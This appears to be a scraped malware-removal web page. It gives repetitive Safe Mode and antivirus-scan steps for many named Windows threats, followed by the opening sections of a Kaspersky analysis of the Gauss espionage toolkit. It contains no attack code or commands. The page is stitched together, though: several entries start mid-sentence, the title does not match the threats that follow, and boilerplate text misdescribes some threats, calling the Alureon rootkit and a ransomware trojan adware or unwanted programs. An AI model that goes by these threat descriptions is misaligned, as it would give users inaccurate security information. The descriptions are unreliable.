     How to Remove Trojan:Win32/Dynamer!ac

    Step 1 : Download Microsoft Safety Scanner and Run a Scan

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    If you have previous version of Microsoft Safety Scanner that is more than 10 days old, please disregard it. Download a new copy from the official web site. Every 10 days, Microsoft will release the latest edition of this tool with updated anti-virus definitions to ensure that it will detect even most recent malware threats.

    1. Download Microsoft Safety Scanner by clicking the button below and save it on your desktop. This is a free tool from Microsoft that offers on-demand scanning. It helps remove computer infection such as malware, virus, and Trojan.

  • Technical Details:

     Characteristics
    When W64.Viknok.B!inf is executed, it will connect to specified command and control (C&C) server. When connection is established, the Trojan then downloads a malicious file. This file is hard to identify due to random file name it is utilizing. W64.Viknok.B!inf then infects the file rpcss.dll in order to initiate its command each time you start Windows.

    There is also an observation that W64.Viknok.B!inf Trojan is utilized to alter settings of victim’s Internet browser. Effects of these changes can be browser redirection, search result hijacking, and unknown home page setting. However, search result hijacking is apparent to most victims. Report shows that after using Google to search the web, user will be redirected to unknown web site after clicking on any of the result. This however leads to an income generating action. The landing page delivers advertisements that when clicked or viewed will earn a profit for the referrer.

    Distribution
    W64.Viknok.B!inf normally spreads on spam email messages. It is attached to an email with deceptive messages prompting recipient to open the file. When executed, W64.Viknok.B!inf checks the computer for installed antivirus program and disable it.

  • Remove:

     How to Remove W64.Viknok.B!inf

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Scan and remove W64.Viknok.B!inf with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections including W64.Viknok.B!inf. MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove W64.Viknok.B!inf, it is best to download and run the recommended tool. Please click the button below to begin download.

  • Technical Details:

     VirTool:JS/Obfuscator.EK is a detection for a risky JavaScript file that hides itself to avoid anti-virus program detection.. This JavaScript Trojan may are usually found on malicious web sites, and is made with the sole purpose of harming visitor’s computer. Among the hazard that VirTool:JS/Obfuscator.EK can bring into the PC are browser redirection, Trojan download, and backdoor access.

  • Remove:

     How to Remove VirTool:JS/Obfuscator.EK

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Scan and remove VirTool:JS/Obfuscator.EK with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections including VirTool:JS/Obfuscator.EK. MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove VirTool:JS/Obfuscator.EK, it is best to download and run the recommended tool. Please click the button below to begin download.

  • Technical Details:

     Backdoor.Generic11.ZNE is a risky computer Trojan that may permit a remote attacker to access the infected computer. This approach lets the crook to perform some dodgy actions such as stealing of private data, download files, and monitor certain activities. Backdoor.Generic11.ZNE silently achieves its goal by maintaining a discreet presence inside the PC. Its rootkit function allows the Trojan to run alongside with a valid Windows process to be able to avoid antivirus detection.

    Due to its Zeroaccess (Rootkit) component, Backdoor.Generic11.ZNE manages to inject its malicious code to valid system driver files. Allowing its automatic execution through this method each time Windows starts is feasible. It may also create a Windows service to execute same function. If loaded and running, Backdoor.Generic11.ZNE will lessen security settings on the infected computer by ending processes, which are linked to antivirus program.

    As expected, antivirus program fails to detect and remove Backdoor.Generic11.ZNE from a compromised system. Its power to load on Windows boot-up must be stopped to end its dominance on the affected machine. Thus, we highly advise you to use removal tool made for this type of threat. Follow the guide below to remove Backdoor.Generic11.ZNE, so as the other harmful files from your computer.

  • Remove:

     How to Remove Backdoor.Generic11.ZNE

    Step 1 : Restart Windows in SafeMode with Networking

    Starting Windows is Safe Mode only loads minimal sets of files and drivers. Most start-up malware and viruses don't run in this mode because Windows only loads basic components to initiate the system.

    NOTE: You will need to PRINT or BOOKMARK this procedure, as we have to restart the computer during the removal process.

    To start Windows in Safe Mode with Networking, please do the following:

    1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer.

    Boot in Safe Mode on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode.

    Start computer in Safe Mode using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode from the selections menu.

    2. Once the computer boots into Safe Mode with Networking, please proceed with the steps below.

  • Technical Details:

     Trojan.Pandex!inf is a generic detection for a harmful file that is normally used by malware author to spread separate virus infection. The threat was also designed to gather email addresses from the infected system. In addition, Trojan.Pandex!inf also interfere with your connection to security-related web sites making sure that no updates will be downloaded onto the infected computer.

  • Remove:

     How to Remove Trojan.Pandex!inf

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Scan and remove Trojan.Pandex!inf with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections including Trojan.Pandex!inf. MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove Trojan.Pandex!inf, it is best to download and run the recommended tool. Please click the button below to begin download.

    2. After downloading, double-click on the file to install the application. If you are using Windows Vista or Windows 7, right-click on the file and select 'Run as administator' from the list.
    3. When User Account Control prompts, please click Yes to proceed with the installation.

    4. Follow the prompts and install as 'default' only. There are no changes needed during the installation process.
    5. Before the installation procedure ends, MalwareBytes Anti-Malware will ask for database update, please proceed.

  • Technical Details:

     Characteristics
    Upon execution of Trojan-PSW.Win32.Dybalom.L, it will drop file under Temp directory of Windows. Registry keys are also added to the compromised computer that is essential to perform its tasks.

    The Trojan is also found to have other harmful characteristics like the following:

    It may connect to an Internet and request for additional malware files.
    Author of this Trojan utilized a packer that is not typically used for legitimate software.
    The Trojan may terminate any instance of security software services.
    It contains other characteristics and identified security risks.
    Distribution
    Trojan-PSW.Win32.Dybalom.L spreads through file-sharing network. In most occasions, a Trojan developer embeds its malicious code onto legitimate executable files that are made online through file-sharing servers. Using an encryption method not commonly used for commercial product, it often conceals itself from antivirus program. There are no reports that this Trojan can infect other computers that are on a local network.

  • Remove:

     How to Remove Trojan-PSW.Win32.Dybalom.L

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 2 : Run a scan with your antivirus program

    1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Trojan-PSW.Win32.Dybalom.L.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan on the affected PC. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     The Trojan will drop malicious file that when executed will take advantage of the Adobe Acrobat Reader vulnerabilities to download and execute additional malware.

    Additional threat may possess the following functionalities:

    Connects to various Trojan-specified domains
    Gather system information such as Windows version and service pack installed
    Allow a remote attacker to access the computer through backdoor port
    Takes advantage of vulnerabilities in Adobe Reader, Acrobat versions 8.0 to 9.2 and probably older versions

    Distribution

    HTML/Malicious.PDF.Gen is primarily spread through spam operation. It is either in the form of email or Internet campaign. To be specific, the main goal of HTML/Malicious.PDF.Gen is to download other malware that cannot be distributed over the said campaign. Being small in size and able to escape antivirus detection, this Trojan can easily fit email attachment. Authors of this Trojan also embed the code into downloadable executable files that are hosted on unsafe servers.

  • Remove:

     How to Remove HTML/Malicious.PDF.Gen

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. First thing you should do is reboot the computer in Safe Mode with Networking to avoid HTML/Malicious.PDF.Gen from loading at start-up.

    Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of HTML/Malicious.PDF.Gen.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     Gen:Adware.Heur is a heuristic detection for malicious code that may be installed on the computer by another threat. It can be in the form of browser hijacker, pop-up ads, tool bar, or unwanted browser add-on and extension. Normally, Gen:Adware.Heur are not as harmful as virus but it can be so annoying when installed on the computer.

    Gen:Adware.Heur was designed to identify files that possesses suspicious behaviors indicating presence of potentially unwanted program. This detection may also identify programs that match behavior of known adware programs.

    Unlike computer viruses, Gen:Adware.Heur is just a software that produces advertisements, extra tools, or home page hijacking on the affected computer. It is often comes bundled with third party program that you have downloaded voluntarily. Most people are aware of the program they are installing but always caught oblivious of other codes that comes with it.

    You must remove Gen:Adware.Heur from the computer using effective security tools like anti-malware and anti-virus program. Procedures below may help you easily remove the threat totally when carefully followed.

  • Remove:

     How to Remove Gen:Adware.Heur

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. First thing you should do is reboot the computer in Safe Mode with Networking to avoid Gen:Adware.Heur from loading at start-up.

    Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Gen:Adware.Heur.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     Trojan.Newarxy is a harmful Trojan that can allow a remote attacker to utilize infected system as proxy server. This threat may spread on Internet through another malware or virus. Trojan.Newarxy can also be obtained from risky file-sharing networks, also known as peer-to-peer connection. The backdoor function of Trojan.Newarxy allows an attacker to steal sensitive information including user name and passwords that are stored on the PC.

  • Remove:

     How to Remove Trojan.Newarxy

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. First thing you should do is reboot the computer in Safe Mode with Networking to avoid Trojan.Newarxy from loading at start-up.

    Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Trojan.Newarxy.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

     

  • Technical Details:

     PWS:Win32/Zbot.gen!plock is a generic detection for a variant of Trojan that can steal sensitive information from infected computers. It may also block some antivirus programs from running by disabling its process. PWS:Win32/Zbot.gen!plock will also try to connect to a remote server and download more threats. This password-stealing threat will record key presses from the infected computer and save it as a log file. Then it sends the gathered data to a remote attacker on specific schedule through email or file transfer protocol.

  • Remove:

     How to Remove PWS:Win32/Zbot.gen!plock

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 2 : Run a scan with your antivirus program

    1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of PWS:Win32/Zbot.gen!plock.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan on the affected PC. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     Exploit:Java/Obfuscator.P is a potentially unwanted program. It can be installed on the computer through download manager and third-party software. Usually, programs like Exploit:Java/Obfuscator.P are being installed on the computer without user’s consent. Pay-per-install scheme is also being utilized by people behind this program to deploy it more rapidly. The method doesn’t only load Java/Obfuscator.P; it may also distribute malicious programs like toolbars and home page hijacker together.

    If Java/Obfuscator.P is present on the computer, users may immediately observe certain changes on the browser. This program may display a barrage of pop-ups and other annoyances. It can add toolbar bearing its name or hijack the home page using its custom search engine. Other components of Java/Obfuscator.P may also be installed but re-branded to hide their origin.



    If you have purposely installed Java/Obfuscator.P, a bunch of programs and tools will also surface on the computer without your consent. Some can be uninstalled from Windows Control Panel, but some will give you difficulty during the removal process. Adware usually comes packed to unwanted program such as Java/Obfuscator.P and most people are not given sufficient information about it. For this reason, potentially unwanted programs are somehow deemed malicious by security experts. Although they are not considered as virus, it is still much safer uninstalling such programs.

    To be able to remove Java/Obfuscator.P and other adware from the computer, we have outlined systematic procedures on this page. Carefully follow the guide and download necessary tools that will help you remove the adware effectively.

  • Remove:

     How to Remove Remove Exploit:Java/Obfuscator.P Virus (Removal)

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. First thing you should do is reboot the computer in Safe Mode with Networking to avoid Remove Exploit:Java/Obfuscator.P Virus (Removal) from loading at start-up.

    Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Remove Exploit:Java/Obfuscator.P Virus (Removal).

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     TROJ_CRYPTFILE.SM is a potentially unwanted program. It is typically installed on the computer through a download manager and third-party software. Usually, programs like TROJ_CRYPTFILE.SM are installed on the computer without user’s consent. The malware producers use a Pay-per-install scheme to deploy it more rapidly. The method doesn’t only load TROJ_CRYPTFILE.SM; it may also distribute malicious programs like toolbars and home page hijacker together. It’s best to quickly remove TROJ_CRYPTFILE.SM and get rid of this adware before there’s a chance for it to steal your private information.

    TROJ_CRYPTFILE.SM is an unwanted program because once it establishes itself on your computer it will attempt to encrypt your files and then try to contact you to bribe you to pay them to release these files. This is a common new type of malware called Ransomware. It is a dangerous and wide ranging type of Trojan virus. .

  • Remove:

     How to Remove Remove TROJ_CRYPTFILE.SM RansomWare

    NOTE: We suggest that you PRINT or BOOKMARK this guide. There are steps that we may have to restart the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. First thing you should do is reboot the computer in Safe Mode with Networking to avoid Remove TROJ_CRYPTFILE.SM RansomWare from loading at start-up.

    Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Remove TROJ_CRYPTFILE.SM RansomWare.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If unable to clean or delete, better place the threat in quarantine.

  • Technical Details:

     Trojan:Win32/Autoac from your computer with this guide. To uninstall Trojan:Win32/Autoac, specific steps must be completed, please start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently. Trojan:Win32/Autoac is a potentially unwanted program, that provides non-beneficial and misleading information to the user. This program has a negative online reputation for utilizing this type of information to mislead users.

  • Thread:

     The symptoms of Trojan:Win32/Autoac adware you will see, are as follows:
    1. Potentially installing unwanted programs onto the user’s computer.
    2. Links to random web pages presented in your browser in text hyperlinks.
    3. Popup advertising, fake updates, and other unwanted software updates.
    4. Unable to do certain things with the windows config file or unable to uninstall program.li>
    Trojan:Win32/Autoac, Protect Yourself!
    Trojan:Win32/Autoac is a malware program that is typically bundled with other potentially useful software in a “pay per install” distribution network. How this happens is, when you download software that you actually want to use on your computer, sometimes adware like Trojan:Win32/Autoac is installed along with the wanted program.

    In order to avoid this type of installation, please read very carefully when you are installing software. Always chose custom install instead of “typical” and then during the custom installation, UNCHECK any boxes that show up where it invites you to try new software, anything that is not the software you WANTED to install.

    If you’re careful when you download and install programs you will be safe from Trojan:Win32/Autoac and other similar programs.

  • Remove:

     Trojan:Win32/Autoac is a program that wants you to believe its offering you a useful service. This PUP, tries to tell you that it is providing a service that you need, such as uninstallation, music file, movie player, etc. This description of the program could be considered useful, however the information, redirection and advertising it provides is negative.

    After installation, Trojan:Win32/Autoac can embed itself deeply into your computer and make it very difficult to remove.
    The primary purpose of Trojan:Win32/Autoac is to hijack your computer so that it can allow for other installations of malware, or potentially unwanted programs. It is best to get rid of Trojan:Win32/Autoac before any of this can happen.

  • Technical Details:

     DOS/Alureon.J from your computer with this guide. To uninstall DOS/Alureon.J, specific steps must be completed, please start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently.DOS/Alureon.J is a potentially unwanted program, that provides non-beneficial and misleading information to the user. This program has a negative online reputation for utilizing this type of information to mislead users.

  • Remove:

     DOS/Alureon.J Removal Guide
    DOS/Alureon.J is a program that wants you to believe its offering you a useful service. This PUP, tries to tell you that it is providing a service that you need, such as uninstallation, music file, movie player, etc. This description of the program could be considered useful, however the information, redirection and advertising it provides is negative.



    After installation, DOS/Alureon.J can embed itself deeply into your computer and make it very difficult to remove.
    The primary purpose of DOS/Alureon.J is to hijack your computer so that it can allow for other installations of malware, or potentially unwanted programs. It is best to get rid of DOS/Alureon.J before any of this can happen.

    IMAGE
    The symptoms of DOS/Alureon.J adware you will see, are as follows:
    1. Potentially installing unwanted programs onto the user’s computer.
    2. Links to random web pages presented in your browser in text hyperlinks.
    3. Popup advertising, fake updates, and other unwanted software updates.
    4. Unable to do certain things with the windows config file or unable to uninstall program.li>

  • Technical Details:

     WIN32 / DYNAMERLAC from your computer with this guide. To uninstall TROJAN : WIN32 / DYNAMERLAC , specific steps must be completed, please start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently.

  • Spreading method:

     TROJAN : WIN32 / DYNAMERLAC is a malware program that is typically bundled with other potentially useful software in a “pay per install” distribution network. How this happens is, when you download software that you actually want to use on your computer, sometimes adware like TROJAN : WIN32 / DYNAMERLAC is installed along with the wanted program.

    In order to avoid this type of installation, please read very carefully when you are installing software. Always chose custom install instead of “typical” and then during the custom installation, UNCHECK any boxes that show up where it invites you to try new software, anything that is not the software you WANTED to install.

    If you’re careful when you download and install programs you will be safe from TROJAN : WIN32 / DYNAMERLAC and other similar programs.

  • Remove:

     ROJAN : WIN32 / DYNAMERLAC is a program that wants you to believe its offering you a useful service. This PUP, tries to tell you that it is providing a service that you need, such as uninstallation, music file, movie player, etc. This description of the program could be considered useful, however the information, redirection and advertising it provides is negative.

    After installation, TROJAN : WIN32 / DYNAMERLAC can embed itself deeply into your computer and make it very difficult to remove.
    The primary purpose of TROJAN : WIN32 / DYNAMERLAC is to hijack your computer so that it can allow for other installations of malware, or potentially unwanted programs. It is best to get rid of TROJAN : WIN32 / DYNAMERLAC before any of this can happen.

    The symptoms of TROJAN : WIN32 / DYNAMERLAC adware you will see, are as follows:
    1. Potentially installing unwanted programs onto the user’s computer.
    2. Links to random web pages presented in your browser in text hyperlinks.
    3. Popup advertising, fake updates, and other unwanted software updates.
    4. Unable to do certain things with the windows config file or unable to uninstall program.li>

  • Technical Details:

    Gauss: Abnormal Distribution

    • Introduction
    • Executive Summary
    • Infection stats
    • Architecture
    • Wmiqry32/Wmihlp32.dll aka ShellHW
    • Dskapi.ocx
    • Smdk.ocx
    • McDmn.ocx
    • Lanhlp32.ocx
    • Devwiz.ocx
    • Winshell.ocx
    • Windig.ocx
    • Gauss C&C Information
    • Timeline
    • Files list
    • Conclusion

       You can download PDF version of this article here.

    Introduction

    While analyzing the Flame malware that we detected in May 2012, Kaspersky Lab experts identified some distinguishing features of Flame's modules. Based on those features, we discovered that in 2009, the first variant of the Stuxnet worm included a module that was created based on the Flame platform. This indicates that there was some form of collaboration between the groups that developed the Flame and Tilded (Stuxnet/Duqu) platforms.

    Based on the results of a detailed analysis of Flame, we continued to actively search for new, unknown components. A more in-depth analysis conducted in June 2012 resulted in the discovery of a new, previously unknown malware platform that uses a modular structure resembling that of Flame, a similar code base and system for communicating to C&C servers, as well as numerous other similarities to Flame.

    In our opinion, all of this clearly indicates that the new platform which we discovered and which we called 'Gauss,' is another example of a cyber-espionage toolkit based on the Flame platform.

    Gauss is a project developed in 2011-2012 along the same lines as the Flame project. The malware has been actively distributed in the Middle East for at least the past 10 months. The largest number of Gauss infections has been recorded in Lebanon, in contrast to Flame, which spread primarily in Iran.

    Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks - for instance, Bank of Beirut, Byblos Bank, and Fransabank.

    Curiously, several Gauss modules are named after famous mathematicians. The platform includes modules that go by the names 'Gauss', 'Lagrange', 'Godel', 'Tailor', 'Kurt' (in an apparent reference to Godel). The Gauss module is responsible for collecting the most critical information, which is why we decided to name the entire toolkit after it.

    Gauss is a much more widespread threat than Flame. However, we have found no self-replication functionality in the modules that we have seen to date, which leaves open the question of its original attack vector.

    Executive Summary

    The first known Gauss infections date back to September-October 2011. During that period, the Gauss authors modified different modules multiple times. They also changed command server addresses. In the middle of July 2012, when we had already discovered Gauss and were studying it, the command servers went offline.

    Gauss is designed to collect information and send the data collected to its command-and-control servers. Information is collected using various modules, each of which has its own unique functionality:

    • Injecting its own modules into different browsers in order to intercept user sessions and steal passwords, cookies and browser history.
    • Collecting information about the computer's network connections.
    • Collecting information about processes and folders.
    • Collecting information about BIOS, CMOS RAM.
    • Collecting information about local, network and removable drives.
    • Infecting USB drives with a spy module in order to steal information from other computers.
    • Installing the custom Palida Narrow font (purpose unknown).
    • Ensuring the entire toolkit's loading and operation.
    • Interacting with the command and control server, sending the information collected to it, downloading additional modules.

    The spy module that works on USB drives uses an .LNK exploit for the CVE-2010-2568 vulnerability. The exploit is similar to the one used in the Stuxnet worm, but it is more effective. The module masks the Trojan's files on the USB drive without using a driver. It does not infect the system: information is extracted from it using a spy module (32- or 64-bit) and saved on the USB drive.

    Infection stats

    We began our investigation into Gauss in early June 2012. Based on data obtained through the Kaspersky Security Network, we noticed right away that the Trojan appeared to be widely distributed in three particular countries in the Middle East.

    Further observation later confirmed this three-country concentration. As of 31 July 2012, we've counted around 2500 unique PCs on which files from the Gauss collection have been found.

     
    Most infected countries

    The highest number of infections is recorded in Lebanon, with more than 1600 computers affected. The Gauss code (winshell.ocx) contains direct commands to intercept data required to work with Lebanese banks - including the Bank of Beirut, Byblos Bank and Fransabank.

    In Israel and the Palestinian Territory, 750 incidents have been recorded.

    Country Unique users
    Lebanon 1660
    Israel 483
    Palestinian Territory 261
    United States 43
    United Arab Emirates 11
    Germany 5
    Egypt 4
    Qatar 4
    Jordan 4
    Saudi Arabia 4
    Syria 4

    Top 10 infected countries

    As can be seen in the above table, with the exceptions of the USA and Germany, all incidents took place in the Middle East. However, we believe that in the majority of cases linked to the USA and Germany the affected users were actually in the Middle East too - using VPNs (or the Tor anonymity network).

    In all, we've recorded incidents in 25 countries around the world; however, in all the countries outside the top 10 only one or two incidents have been recorded:


    Total infected users

    Regarding the spreading mechanism used by Gauss, the obtained data leave us with more questions unanswered than solved. The overall number of infections (around 2500) that we've detected could in reality just be a small portion of tens of thousands of infections, since our statistics only cover users of Kaspersky Lab products.

    When we compare the number of Gauss infections with those of other programs discovered earlier that have either common components or structures, we get the following figures:

    Name Incidents (KL stats) Incidents (approx.)
    Stuxnet More than 100 000 More than 300 000
    Gauss ~ 2500 ?
    Flame ~ 700 ~5000-6000
    Duqu ~20 ~50-60

    Gauss has been spreading in the region for at least 10 months, in the course of which it has infected thousands of systems. On one hand, this is an uncharacteristically high number for targeted attacks similar to Duqu (it's possible that such a high number of incidents is due to the presence of a worm in one of the Gauss modules that we still don't know about). However, the infections have been predominantly within the boundaries of a rather small geographical region. If the malware had the ability to spread indiscriminately - for example, on USB sticks as was the case with Stuxnet - infections would have been detected in much greater numbers in other countries.

    Operating System Statistics

    Gauss was designed for 32-bit versions of the Windows operating system. Some of the modules do not work under Windows 7 SP1.

    OS % from total
    Windows 7 34,87
    XP Professional SP2 26,40
    XP Professional SP3 17,92
    Windows 7 SP1 10,77
    Windows 7 Home 2,15
    Vista Home SP1 1,71
    Vista Home 1,22
    Windows 7 Home SP1 0,88
    Vista Home SP2 0,83
    Vista 0,64
    Vista SP2 0,39
    XP Home Edition 0,39
    Vista SP1 0,34
    Other 1,47

    There is a separate spy module that operates on USB drives (see description of dskapi.ocx) and is designed to collect information from 64-bit systems.

    Architecture

    Gauss is a modular system. The number and combination of modules may change from one infected system to another. In the course of our research, we discovered the following modules:

    Module name Location Description
    Cosmos %system32%\devwiz.ocx Collects information about CMOS, BIOS
    Kurt, Godel %system32%\dskapi.ocx Infects USB drives with data-stealing module
    Tailor %system32%\lanhlp32.ocx Collects information about network interfaces
    McDomain %system32%\mcdmn.ocx Collects information about user's domain
    UsbDir %system32%\smdk.ocx Collects information about computer's drives
    Lagrange %system32%\windig.ocx Installs a custom 'Palida Narrow' font
    Gauss %system32%\winshell.ocx Installs browser plugins that collect passwords and cookies
    ShellHW "%system32%\wbem\wmiqry32.ocx
    %system32%\wbem\wmihlp32.ocx "
    Main loader and communication module

    The configuration of a specific combination of modules for each system is described in a special registry key. This technique, as well as the configuration structure itself, is similar to that used in Stuxnet/Duqu (storing of the configuration in the Windows registry) and Flame (configuration structure). Flame stores its configuration in the main module (mssecmgr.ocx).

